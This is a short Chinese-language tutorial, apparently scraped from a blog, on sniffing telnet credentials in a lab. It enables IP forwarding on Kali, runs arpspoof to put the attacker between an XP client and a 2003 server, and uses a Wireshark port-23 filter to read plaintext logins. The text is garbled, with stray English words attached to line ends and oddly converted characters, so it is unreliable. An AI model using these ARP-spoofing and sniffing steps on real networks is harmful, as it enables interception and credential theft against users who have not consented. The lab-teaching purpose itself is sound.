Wireshark嗅探抓取telnet明文帳戶密碼

0x00

Wireshark(前稱Ethereal)是一個網絡封包分析軟件。網絡封包分析軟件的功能是擷取網絡封包,並儘量顯示出最爲詳細的網絡封包資料。Wireshark使用WinPCAP做爲接口,直接與網卡進行數據報文交換。網絡

咱們能夠利用arpspoof攔截轉發同一網段下其餘用戶流量,再使用Wireshark來分析查看流量tcp

配置環境:spa

攻擊端:kali 
code

靶機端:2003 xpblog

0x01

首先確保三臺機在同一網段下接口

 

 

 

kali IP爲192.168.1.3ip

XP IP爲192.168.1.2get

2003 IP爲192.168.1.1it

kali開啓流量轉發class

cat /proc/sys/net/ipv4/ip_forward       查看瀏覽轉發,若是是0就是沒有開啓,1是開啓
0    能夠看到沒有開啓
echo 1 > /proc/sys/net/ipv4/ip_forward      修改成1
這是時候咱們的流量轉發就能開啓,別人的流量通過我這裏也能轉發出去

 

 接下來就是嗅探轉發獲取流量了

這裏用到arpspoof來轉發流量

arpspoof -i (本身網卡) -t  目標IP  網關

 

 打開Wireshark點開本身arpspoof配置的網卡

xp經過telnet鏈接2003

 

 回到Wireshark開始過濾

過濾規則

ip.addr==目標IP && tcp.port==23

 

 

 

 xp經過telnet鏈接2003時的明文帳戶密碼直接暴露出來了

相關文章
相關標籤/搜索